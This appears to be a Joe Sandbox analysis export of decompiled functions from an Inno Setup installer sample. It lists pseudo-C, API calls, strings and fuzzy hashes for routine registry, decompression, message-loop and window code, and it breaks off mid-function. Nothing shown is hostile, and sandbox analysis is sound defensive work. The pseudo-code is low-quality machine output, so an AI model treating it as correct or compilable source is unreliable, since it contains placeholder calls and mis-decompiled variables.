Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: CloseErrorHandleLast
String ID: CreateFile
API String ID: 918212764-823142352
Opcode ID: da3e01079fcc79da4f6e5358b9890d359b059ab230e318bc78e4d026129480bb
Instruction ID: 92ebb9f275cdee17ba8e03babab10addfbb1bf9672ec32410b4836965cc47a3b
Opcode Fuzzy Hash: da3e01079fcc79da4f6e5358b9890d359b059ab230e318bc78e4d026129480bb
Instruction Fuzzy Hash: 2CE03970240304AFEA10A669CCCAF6A77889B04728F108155FA88AF3E2D5A9EC448659

Uniqueness

Uniqueness Score: -1.00%

Function 004676E8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24
COMMON

Download Yara Rule

C-Code - Quality: 43%

			E004676E8(void* __eax, void* __edx, intOrPtr _a4) {
				char _v8;
				void* __ecx;
				void* __ebp;
				void* _t12;
				char _t13;
				void* _t18;
				void* _t19;

				_v8 = _t13;
				_push(4);
				_t2 =  &_v8; // 0x4ae064
				_push(4);
				_push(0);
				_push(__edx);
				_push(__eax); // executed
				L00405934(); // executed
				if(__eax != 0) {
					return E0046755C(0, _t12,  *((intOrPtr*)(_a4 - 8)),  *((intOrPtr*)(_a4 - 4)), _t18, _t19, 0, __eax);
				}
				return __eax;
			}

0x004676ec
0x004676ef
0x004676f1
0x004676f5
0x004676f7
0x004676f9
0x004676fa
0x004676fb
0x00467702
0x00000000
0x00467713
0x0046771a

APIs

6D2B68C0.ADVAPI32(?,NoModify,00000000,00000004,dJ,00000004,00000001,?,00467B7A,?,?,00000000,00467C07,?,_is1,00000001), ref: 004676FB

Strings

dJ, xrefs: 004676F1, 004676F4
NoModify, xrefs: 004676F9

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID:
String ID: NoModify$dJ
API String ID: 0-800172441
Opcode ID: 5bf5e1e6e107bb9a7a5d0b7ed4729e7556d4d87d55e1c88d5e7d295b86db15ce
Instruction ID: 87aa0254bd23a66089402b5b6b897a932c5b513ec548fed5d435c92841c13577
Opcode Fuzzy Hash: 5bf5e1e6e107bb9a7a5d0b7ed4729e7556d4d87d55e1c88d5e7d295b86db15ce
Instruction Fuzzy Hash: B4E04FB0644304BFEB04DB55CD4AF6B77ECDB48764F104059BA089B291E674FE00CA68

Uniqueness

Uniqueness Score: -1.00%

Function 0045A430 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 134
memoryCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E0045A430(intOrPtr __eax, void* __ebx, void* __edi, void* __esi) {
				char _v5;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				long _v24;
				void* _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _t94;
				intOrPtr _t104;
				intOrPtr _t117;
				signed int _t120;
				void* _t123;
				char _t124;
				void* _t127;
				void* _t142;

				_v32 = 0;
				_t104 = __eax;
				_push(_t127);
				_push(0x45a5be);
				_push( *[fs:eax]);
				 *[fs:eax] = _t127 + 0xffffffdc;
				if( *((intOrPtr*)(__eax + 4))() != 1) {
					E0045A344(1);
				}
				if( *((intOrPtr*)(_t104 + 4))() != 4) {
					E0045A344(2);
				}
				if(_v12 < 0 || _v12 > 0x2000000) {
					E0045A344(7);
				}
				if(_v5 >= 0xe1) {
					E0045A344(3);
				}
				_v20 = 0;
				while(_v5 >= 0x2d) {
					_v20 = _v20 + 1;
					_v5 = _v5 - 0x2d;
				}
				_t123 = 0;
				while(_v5 >= 9) {
					_t123 = _t123 + 1;
					_v5 = _v5 - 9;
				}
				_v16 = 0;
				_t120 = E0045B028(_v16, _t123);
				if((_t120 & 0x00000003) != 0) {
					_t120 = (_t120 | 0x00000003) + 1;
				}
				_v24 = _v12 + _t120;
				if( *(_t104 + 0x20) != _v24) {
					E0045A3D4(_t104);
					_t94 = VirtualAlloc(0, _v24, 0x1000, 4); // executed
					 *(_t104 + 0x1c) = _t94;
					if( *(_t104 + 0x1c) == 0) {
						E00408DE4();
					}
					 *(_t104 + 0x20) = _v24;
				}
				_v28 =  *(_t104 + 0x1c);
				 *((intOrPtr*)(_t104 + 0x10)) = 0x45a3a0;
				 *((intOrPtr*)(_t104 + 0x14)) = _t104;
				_t124 = E0045A9D4(_v28, _v16, _t120, _t104 + 0x10, _v12, _v28 + _t120, _v20, _t123);
				_t142 = _t124 - 1;
				if(_t142 >= 0) {
					if(_t142 == 0) {
						E0045A344(4);
					} else {
						_v40 = _t124;
						_v36 = 0;
						E00407B08("LzmaDecoderInit failed (%d)", 0,  &_v40,  &_v32);
						E0045A2CC(_v32, _t104, 0, _t120, _t124);
					}
				}
				 *(_t104 + 0x18) = _v28;
				_pop(_t117);
				 *[fs:eax] = _t117;
				_push(0x45a5c5);
				return E00403548( &_v32);
			}

0x0045a43b
0x0045a43e
0x0045a442
0x0045a443
0x0045a448
0x0045a44b
0x0045a45d
0x0045a464
0x0045a464
0x0045a47a
0x0045a481
0x0045a481
0x0045a48a
0x0045a49a
0x0045a49a
0x0045a4a3
0x0045a4aa
0x0045a4aa
0x0045a4b1
0x0045a4b8
0x0045a4ba
0x0045a4bd
0x0045a4c1
0x0045a4c7
0x0045a4cd
0x0045a4cf
0x0045a4d0
0x0045a4d4
0x0045a4df
0x0045a4ec
0x0045a4f4
0x0045a4f9
0x0045a4f9
0x0045a4ff
0x0045a508
0x0045a50c
0x0045a51e
0x0045a523
0x0045a52a
0x0045a52c
0x0045a52c
0x0045a534
0x0045a534
0x0045a53a
0x0045a542
0x0045a549
0x0045a567
0x0045a56b
0x0045a56e
0x0045a570
0x0045a579
0x0045a572
0x0045a584
0x0045a587
0x0045a595
0x0045a59d
0x0045a59d
0x0045a570
0x0045a5a5
0x0045a5aa
0x0045a5ad
0x0045a5b0
0x0045a5bd

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 0045A51E

Strings

-, xrefs: 0045A4C1
LzmaDecoderInit failed (%d), xrefs: 0045A590

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: AllocVirtual
String ID: -$LzmaDecoderInit failed (%d)
API String ID: 4275171209-4285503710
Opcode ID: 621d95ef71f6858ea72ceff4776af29aba9d5c77bdc7562fde38282554932a55
Instruction ID: 3a8d2ab1d949706bf40386ce327b59ee06084d7b6c340cfe13ec33ceaf29663c
Opcode Fuzzy Hash: 621d95ef71f6858ea72ceff4776af29aba9d5c77bdc7562fde38282554932a55
Instruction Fuzzy Hash: E4518470A04208AFDB00DFA9C449B9EBBB5EF45305F14426BED04EB243D77C9959CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 00424614 Relevance: 4.6, APIs: 3, Instructions: 59
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00424614(void* __eax) {
				struct tagMSG _v36;
				int _t16;
				int _t32;
				void* _t39;
				char* _t40;

				_t40 =  &(_v36.message);
				_t39 = __eax;
				_t32 = 0;
				_t16 = PeekMessageA( &_v36, 0, 0, 0, 1); // executed
				if(_t16 != 0) {
					_t32 = 1;
					if(_v36.message == 0x12) {
						 *((char*)(_t39 + 0x7c)) = 1;
					} else {
						 *_t40 = 0;
						if( *((short*)(_t39 + 0x96)) != 0) {
							 *((intOrPtr*)(_t39 + 0x94))();
						}
						if(E004245E4(_t39,  &_v36) == 0 &&  *_t40 == 0 && E00424530(_t39,  &_v36) == 0 && E00424580(_t39,  &_v36) == 0 && E0042450C(_t39,  &_v36) == 0) {
							TranslateMessage( &_v36);
							DispatchMessageA( &_v36); // executed
						}
					}
				}
				return _t32;
			}

0x00424616
0x00424619
0x0042461b
0x0042462a
0x00424631
0x00424637
0x0042463e
0x004246b8
0x00424640
0x00424640
0x0042464c
0x0042465a
0x0042465a
0x0042466d
0x004246a7
0x004246b1
0x004246b1
0x0042466d
0x0042463e
0x004246c3

APIs

PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 0042462A
TranslateMessage.USER32(?), ref: 004246A7
DispatchMessageA.USER32 ref: 004246B1

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: Message$DispatchPeekTranslate
String ID:
API String ID: 4217535847-0
Opcode ID: 101501b58656229cd05d7a27e6a43ae9461bd87c187a46cc92432eddc1cd9a7a
Instruction ID: cbb115951d373a7ac228c0bdda5e03c02774bbeb5e0b5da5e65f50fe82f2540b
Opcode Fuzzy Hash: 101501b58656229cd05d7a27e6a43ae9461bd87c187a46cc92432eddc1cd9a7a
Instruction Fuzzy Hash: F611A7703043106ADA20EAA4F941B9B77D5CFC2704F80491EF9C967382D7BD9E4A879A

Uniqueness

Uniqueness Score: -1.00%

Function 0041685C Relevance: 4.5, APIs: 3, Instructions: 39
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041685C(void* __eax) {
				int _t7;
				void* _t19;
				void* _t22;
				intOrPtr _t23;

				_t7 = __eax;
				_t19 = __eax;
				if( *(__eax + 0xc0) == 0) {
					 *((intOrPtr*)( *__eax + 0x64))();
					_t22 = __eax;
					SetPropA( *(__eax + 0xc0),  *0x48d5c8 & 0x0000ffff, __eax);
					_t7 = SetPropA( *(_t19 + 0xc0),  *0x48d5c6 & 0x0000ffff, _t22);
					_t23 =  *((intOrPtr*)(_t19 + 0x20));
					_t25 = _t23;
					if(_t23 != 0) {
						return SetWindowPos( *(_t19 + 0xc0), E00416814(_t23, _t19, _t25), 0, 0, 0, 0, 0x13);
					}
				}
				return _t7;
			}

0x0041685c
0x0041685e
0x00416867
0x0041686d
0x00416870
0x00416882
0x00416897
0x0041689c
0x0041689f
0x004168a1
0x00000000
0x004168be
0x004168a1
0x004168c5

APIs

SetPropA.USER32(00000000,00000000), ref: 00416882
SetPropA.USER32(00000000,00000000), ref: 00416897
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,00000000,00000000,?,00000000,00000000), ref: 004168BE

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: Prop$Window
String ID:
API String ID: 3363284559-0
Opcode ID: 2e2514f257e95376671d7c0d12f94f83b3af382eb4e12e0b0a418a898c20a414
Instruction ID: 348b5f1b6fb5962e7ea440be5696d7d57ae95876bc31aaabdf682a8b60d91e04
Opcode Fuzzy Hash: 2e2514f257e95376671d7c0d12f94f83b3af382eb4e12e0b0a418a898c20a414
Instruction Fuzzy Hash: 3EF0B271B02220ABE710BF999C85FA633DCAB09715F1505BAB904EF2C6C678DD45C7B4

Uniqueness

Uniqueness Score: -1.00%

Function 00476E54 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00476E54(void* __eflags, void* __fp0) {
				char _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t6;
				void* _t10;
				intOrPtr _t11;
				intOrPtr _t17;
				void* _t20;
				intOrPtr _t22;
				intOrPtr _t30;
				void* _t31;
				void* _t33;
				intOrPtr _t36;

				_t40 = __fp0;
				_push(_t20);
				_push(_t33);
				_push(_t31);
				_t22 =  *0x48d628; // 0x21d2410
				_t6 = E00460F30(_t20, _t22, 1, _t31, _t33, __fp0); // executed
				 *0x4adf64 = _t6;
				_t38 =  *0x4ae298;
				if( *0x4ae298 != 0) {
					_push( *[fs:eax]);
					 *[fs:eax] = _t36;
					_v12 = 0;
					_v8 = 0xb;
					_t17 =  *0x4ae298; // 0x21fdcf0
					E00487508(_t17,  &_v12, "InitializeWizard", _t38, __fp0, 0, 0);
					_pop(_t30);
					_t22 = 0x476eb4;
					 *[fs:eax] = _t30;
				}
				E00463DE4( *0x4adf64, _t22, 1, _t38, _t40);
				if( *0x4ae24d != 0) {
					_t10 = E004658B0( *0x4adf64, _t20, _t22, _t31, _t33); // executed
				} else {
					_t11 =  *0x48d628; // 0x21d2410
					SetActiveWindow( *(_t11 + 0x20));
					_t10 = E0042301C( *0x4adf64);
				}
				return _t10;
			}

0x00476e54
0x00476e5a
0x00476e5b
0x00476e5c
0x00476e5d
0x00476e6a
0x00476e6f
0x00476e74
0x00476e7b
0x00476e85
0x00476e88
0x00476e91
0x00476e94
0x00476ea0
0x00476ea5
0x00476eac
0x00476eae
0x00476eaf
0x00476eaf
0x00476ed7
0x00476ee3
0x00476f04
0x00476ee5
0x00476ee5
0x00476eee
0x00476ef8
0x00476ef8
0x00476f0f

APIs

SetActiveWindow.USER32(?), ref: 00476EEE

Strings

InitializeWizard, xrefs: 00476E9B

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: ActiveWindow
String ID: InitializeWizard
API String ID: 2558294473-2356795471
Opcode ID: ec8edcab4a078f5af787f177166efaa3c32d3e3913135087064beb897a1841c6
Instruction ID: 686b7e06ee3e7c8eeb774db20f11596040e0a247b59185631a7d834df8d8b81a
Opcode Fuzzy Hash: ec8edcab4a078f5af787f177166efaa3c32d3e3913135087064beb897a1841c6
Instruction Fuzzy Hash: C911E5316086409FD304FF29EC42B863BE9D30A328F61847BF40987AE0E6399804C72D

Uniqueness

Uniqueness Score: -1.00%

Function 00471998 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00471998(void* __eax, void* __edx, void* __eflags) {
				void* _v8;
				void* __ecx;
				void* _t7;
				long _t13;
				void* _t17;
				void* _t24;

				_t24 = _t17;
				_t7 = E0042DD88(__eax, "Software\\Microsoft\\Windows\\CurrentVersion", 0x80000002,  &_v8, 1, 0); // executed
				if(_t7 != 0) {
					return E00403548(_t24);
				}
				if(E0042DCB8() == 0) {
					E00403548(_t24);
				}
				_t13 = RegCloseKey(_v8); // executed
				return _t13;
			}

0x0047199f
0x004719b9
0x004719c0
0x00000000
0x004719e6
0x004719d0
0x004719d4
0x004719d4
0x004719dd
0x00000000

APIs

Part of subcall function 0042DD88: 6D2B6790.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00477FD3,?,00000001,?,?,00477FD3,?,00000001,00000000), ref: 0042DDA4

RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,?,?,00471BCE,00000000,00471D08), ref: 004719DD

Strings

Software\Microsoft\Windows\CurrentVersion, xrefs: 004719AD

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: B6790Close
String ID: Software\Microsoft\Windows\CurrentVersion
API String ID: 2256921126-1019749484
Opcode ID: 14a6a978719598d26cc525b017e61cc47e42a5b614a0d247eed49da72d7bd165
Instruction ID: 425479ba66dc75bc9cdd290e9e57642917d3675fcb52ac5f8299042defdb5fd7
Opcode Fuzzy Hash: 14a6a978719598d26cc525b017e61cc47e42a5b614a0d247eed49da72d7bd165
Instruction Fuzzy Hash: A2F082B270411477DA04A5AFAC52AAFA29C8F84758F20403BF649D7261D9A9DE029358

Uniqueness

Uniqueness Score: -1.00%

Function 00467678 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E00467678(void* __eax, void* __ecx, void* __edx, intOrPtr _a4) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t10;
				void* _t21;

				_t21 = __eax;
				_push(E004036BC(__ecx) + 1);
				_t10 = E00403880(__ecx);
				_push(_t10);
				_push(1);
				_push(0);
				_push(__edx);
				_push(_t21); // executed
				L00405934(); // executed
				if(_t10 != 0) {
					return E0046755C(0, __ecx,  *((intOrPtr*)(_a4 - 8)),  *((intOrPtr*)(_a4 - 4)), __edx, _t21, 0, _t10);
				}
				return _t10;
			}

0x00467682
0x0046768c
0x0046768f
0x00467694
0x00467695
0x00467697
0x00467699
0x0046769a
0x0046769b
0x004676a2
0x00000000
0x004676b3
0x004676bc

APIs

6D2B68C0.ADVAPI32(?,Inno Setup: Setup Version,00000000,00000001,00000000,00000001,?,00000001,004AE064,?,0046780B,?,00000000,00467C07,?,_is1), ref: 0046769B

Strings

Inno Setup: Setup Version, xrefs: 00467699

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID:
String ID: Inno Setup: Setup Version
API String ID: 0-4166306022
Opcode ID: 240baf9f946119168dcfc4d04177a678600fed45a8065c649f01a787b921a41a
Instruction ID: ec68abbe36a8d6f53f4cf507a5851cd9d1a1bac321da2742eb9d660d9011b95c
Opcode Fuzzy Hash: 240baf9f946119168dcfc4d04177a678600fed45a8065c649f01a787b921a41a
Instruction Fuzzy Hash: 89E06D713016047BD710AA2E9C89F6BAADCDF897A9F00407AB90CDB392D578DD4085A8

Uniqueness

Uniqueness Score: -1.00%

Function 0042DD88 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 18
COMMON

Download Yara Rule

C-Code - Quality: 51%

			E0042DD88(void* __eax, void* __ecx, void* __edx, intOrPtr _a4, signed int _a8, intOrPtr _a12) {
				intOrPtr _t6;
				void* _t7;
				void* _t8;
				signed int _t9;

				_t8 = __edx;
				_t7 = __ecx;
				_t9 = _a8;
				if(__eax == 2) {
					_t9 = _t9 | 0x00000100;
				}
				_push(_a4);
				_push(_t9);
				_t6 = _a12;
				_push(_t6);
				_push(_t7);
				_push(_t8); // executed
				L00405914(); // executed
				return _t6;
			}

0x0042dd88
0x0042dd88
0x0042dd8c
0x0042dd91
0x0042dd93
0x0042dd93
0x0042dd9c
0x0042dd9d
0x0042dd9e
0x0042dda1
0x0042dda2
0x0042dda3
0x0042dda4
0x0042ddab

APIs

6D2B6790.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00477FD3,?,00000001,?,?,00477FD3,?,00000001,00000000), ref: 0042DDA4

Strings

System\CurrentControlSet\Control\Windows, xrefs: 0042DDA2

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: B6790
String ID: System\CurrentControlSet\Control\Windows
API String ID: 942150986-1109719901
Opcode ID: 9452c226d8c6f758ed12fe55bb04564b8888c6db6bcbc944cb58ab6289bc677e
Instruction ID: 05110dbdb8631298ebd9b70879473f8c73d3283da03f96e5be027dfe4aeb004a
Opcode Fuzzy Hash: 9452c226d8c6f758ed12fe55bb04564b8888c6db6bcbc944cb58ab6289bc677e
Instruction Fuzzy Hash: D7D0C9B692052CBBDB00EA89DC41DFB779DDB59360F44802AFD089B200C2B5ED519BF8

Uniqueness

Uniqueness Score: -1.00%

Function 0042DB84 Relevance: 3.1, APIs: 2, Instructions: 104
registryCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E0042DB84(void* __eax, void* __ebx, intOrPtr __ecx, char* __edx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				int _v12;
				int _v16;
				char _v20;
				long _t48;
				long _t59;
				char _t67;
				intOrPtr _t82;
				int _t87;
				char* _t89;
				void* _t91;
				void* _t94;

				_v20 = 0;
				_v8 = __ecx;
				_t89 = __edx;
				_t91 = __eax;
				_push(_t94);
				_push(0x42dca5);
				_push( *[fs:eax]);
				 *[fs:eax] = _t94 + 0xfffffff0;
				while(1) {
					_v16 = 0;
					_t48 = RegQueryValueExA(_t91, _t89, 0,  &_v12, 0,  &_v16); // executed
					if(_t48 != 0 || _v12 != _a8 && _v12 != _a4) {
						break;
					}
					if(_v16 != 0) {
						E00403628( &_v20, _v16, 0, __eflags);
						_t59 = RegQueryValueExA(_t91, _t89, 0,  &_v12, E0040388C( &_v20),  &_v16); // executed
						__eflags = _t59 - 0xea;
						if(__eflags == 0) {
							continue;
						}
						__eflags = _t59;
						if(_t59 != 0) {
							break;
						}
						__eflags = _v12 - _a8;
						if(_v12 == _a8) {
							while(1) {
								L12:
								__eflags = _v16;
								if(_v16 == 0) {
									break;
								}
								_t67 = _v20;
								_t87 = _v16;
								__eflags =  *((char*)(_t67 + _t87 - 1));
								if( *((char*)(_t67 + _t87 - 1)) == 0) {
									_t21 =  &_v16;
									 *_t21 = _v16 - 1;
									__eflags =  *_t21;
									continue;
								}
								break;
							}
							__eflags = _v12 - 7;
							if(_v12 == 7) {
								__eflags = _v16;
								if(_v16 != 0) {
									_t30 =  &_v16;
									 *_t30 = _v16 + 1;
									__eflags =  *_t30;
								}
							}
							E004039EC( &_v20, _v16);
							__eflags = _v12 - 7;
							if(_v12 == 7) {
								__eflags = _v16;
								if(_v16 != 0) {
									(E0040388C( &_v20))[_v16 - 1] = 0;
								}
							}
							E00403598(_v8, 0, _v20, _t89, _t91);
							break;
						}
						__eflags = _v12 - _a4;
						if(_v12 != _a4) {
							break;
						}
						goto L12;
					} else {
						E00403548(_v8);
						break;
					}
				}
				_pop(_t82);
				 *[fs:eax] = _t82;
				_push(E0042DCAC);
				return E00403548( &_v20);
			}

0x0042db8f
0x0042db92
0x0042db95
0x0042db97
0x0042db9b
0x0042db9c
0x0042dba1
0x0042dba4
0x0042dba9
0x0042dbab
0x0042dbbc
0x0042dbc3
0x00000000
0x00000000
0x0042dbe1
0x0042dbfa
0x0042dc14
0x0042dc19
0x0042dc1e
0x00000000
0x00000000
0x0042dc20
0x0042dc22
0x00000000
0x00000000
0x0042dc27
0x0042dc2a
0x0042dc39
0x0042dc39
0x0042dc39
0x0042dc3d
0x00000000
0x00000000
0x0042dc3f
0x0042dc42
0x0042dc45
0x0042dc4a
0x0042dc36
0x0042dc36
0x0042dc36
0x00000000
0x0042dc36
0x00000000
0x0042dc4a
0x0042dc4c
0x0042dc50
0x0042dc52
0x0042dc56
0x0042dc58
0x0042dc58
0x0042dc58
0x0042dc58
0x0042dc56
0x0042dc61
0x0042dc66
0x0042dc6a
0x0042dc6c
0x0042dc70
0x0042dc7d
0x0042dc7d
0x0042dc70
0x0042dc88
0x00000000
0x0042dc8d
0x0042dc2f
0x0042dc32
0x00000000
0x00000000
0x00000000
0x0042dbe3
0x0042dbe6
0x00000000
0x0042dbeb
0x0042dbe1
0x0042dc91
0x0042dc94
0x0042dc97
0x0042dca4

APIs

RegQueryValueExA.ADVAPI32(?,0042E544,00000000,00000000,00000000,?,00000000,0042DCA5,?,?,00000000,00000000), ref: 0042DBBC
RegQueryValueExA.ADVAPI32(?,0042E544,00000000,00000000,00000000,00000000,?,0042E544,00000000,00000000,00000000,?,00000000,0042DCA5), ref: 0042DC14

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: f42e1d5e97efe8341641d1a4687253219fd58113813f9f83cbdbd2cf027060a1
Instruction ID: b05b9b7cade200c37731d16769ab28c2d5e698a7719e39f3a2ebee64e07680a7
Opcode Fuzzy Hash: f42e1d5e97efe8341641d1a4687253219fd58113813f9f83cbdbd2cf027060a1
Instruction Fuzzy Hash: 40412C70E00128BFDB25DF96D885BEFBBB9EB05304F908577E410E6290D778AA44CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0042DE2C Relevance: 3.1, APIs: 2, Instructions: 104
registryCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E0042DE2C(char __eax, void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi) {
				char _v5;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v20;
				char _v24;
				int _v28;
				void* _t35;
				long _t44;
				long _t51;
				void* _t53;
				int _t61;
				intOrPtr _t75;
				intOrPtr _t79;
				void* _t85;
				void* _t86;
				intOrPtr _t87;

				_t83 = __esi;
				_t82 = __edi;
				_t85 = _t86;
				_t87 = _t86 + 0xffffffe8;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v24 = 0;
				_v16 = __ecx;
				_v12 = __edx;
				_v5 = __eax;
				_push(_t85);
				_push(0x42df57);
				_push( *[fs:eax]);
				 *[fs:eax] = _t87;
				if( *0x48c0e0 != 2) {
					L10:
					E0042DDB0(_v5, _v16, _v12);
					__eflags = 0;
					_pop(_t75);
					 *[fs:eax] = _t75;
					_push(E0042DF5E);
					return E00403548( &_v24);
				} else {
					_t35 = E0042DD88(_v5, _v16, _v12,  &_v20, 8, 0); // executed
					_t89 = _t35;
					if(_t35 != 0) {
						goto L10;
					} else {
						_push(_t85);
						_push(0x42df2a);
						_push( *[fs:edx]);
						 *[fs:edx] = _t87;
						E00403628( &_v24, 0x100, 0, _t89);
						_t61 = 0;
						while(1) {
							L3:
							_v28 = E004036BC(_v24);
							_t44 = RegEnumKeyExA(_v20, _t61, E0040388C( &_v24),  &_v28, 0, 0, 0, 0);
							if(_t44 != 0xea) {
								break;
							}
							_t53 = E004036BC(_v24);
							_t92 = _t53 - 0x10000;
							if(_t53 < 0x10000) {
